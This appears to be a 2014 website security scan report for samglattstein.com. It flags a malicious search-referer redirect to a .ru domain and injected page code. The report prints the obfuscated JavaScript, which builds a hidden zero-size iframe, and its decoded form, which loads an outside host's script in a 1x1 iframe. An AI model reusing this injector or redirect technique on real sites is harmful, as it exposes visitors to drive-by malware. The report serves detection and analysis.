Malicious/Suspicious Redirects
Request:
  URL: http://samglattstein.com/ (imitation of visitor from search engine)
  GET / HTTP/1.1
  Host: samglattstein.com
  Referer: http://www.google.com/search?q=redirect+check1
Server response:
  HTTP/1.1 301 Moved Permanently
  Connection: close
  Date: Thu, 11 Sep 2014 02:23:22 GMT
  Location: http://sertwey.ru/
  Server: Apache
  Content-Length: 293
  Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files
Request | Server response | Status |
http://samglattstein.com/ | 200 OK Content-Length: 9547 Content-Type: text/html | malicious |
Malicious code (confirmed by antiviruses, see below):
var Rcgpr=document;
/* reverses a string; used as the last step of the URL decoder */
function rBDCA(LHPHz){var NAVoM="",nkaMh=0;for(nkaMh=LHPHz.length-1;nkaMh>=0;nkaMh--){NAVoM+=LHPHz.charAt(nkaMh);}return NAVoM;}
/* injects a zero-size CSS class and a hidden iframe whose src ("$") is filled in by iSqVb() */
function QmnLe(){document.write("<style>.rDaLm{width:0%;height:0%;border:none;}</style>");var nMeSc="<iframe/**/name=\"2\" id=\"YnMkb\" src=\"$\" class=\"rDaLm\"></iframe>";var TXAGb=nMeSc.replace(/[\+$]/g,iSqVb(".74.6c.75.61.66.65.64.3f.69.67.63.2e.6e.69.2f.7a.69.62.2e.73.66.66.61.72.74.2f.2f.3a.70.74.74.68"));return TXAGb;}
Rcgpr.writeln(QmnLe());
/* decoder: dot-separated hex -> percent-encoding -> unescape -> reverse, yielding the reversed, hex-encoded iframe URL */
function iSqVb(ylybP){ylybP=ylybP.replace(/[\.]/g,"%");ylybP=unescape(ylybP);return rBDCA(ylybP);}
Decoded script:
document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>');
document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>');
/*** called setTimeout with document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>');, 246 */
<iframe width=1 height=1 border=0 frameborder=0 src='http://bicodehl.com/ghost2.php'></iframe>
Antivirus reports:
http://nt010.cn/E/J.JS | 404 Not Found Content-Length: 13012 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client20130325new.js | 200 OK Content-Length: 2048 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/domain_parking.js | 200 OK Content-Length: 162720 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/ci.js | 200 OK Content-Length: 5760 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/caf.js | 200 OK Content-Length: 8900 Content-Type: application/x-javascript | clean |
http://nt010.cn/test404page.js | 404 Not Found Content-Length: 12997 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=samglattstein.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://samglattstein.com/
Result: samglattstein.com is not infected or malware details are not published yet.